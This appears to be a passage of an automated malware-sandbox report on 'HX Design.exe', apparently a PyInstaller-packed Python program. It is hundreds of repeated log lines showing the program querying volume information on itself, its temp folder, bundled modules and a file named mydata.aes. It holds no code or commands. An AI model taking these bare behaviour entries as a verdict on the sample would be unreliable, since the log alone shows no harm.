Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\mydata.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\mydata.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\mydata.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\mydata.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\mydata.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\mydata.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\_lzma.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\_bz2.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\_sqlite3.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\_socket.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\select.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\_ssl.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\_hashlib.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\_queue.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\charset_normalizer VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\charset_normalizer VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\charset_normalizer VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\charset_normalizer\md.cp313-win_amd64.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\charset_normalizer VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\charset_normalizer\md__mypyc.cp313-win_amd64.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\unicodedata.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\certifi VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformation	Jump to behavior
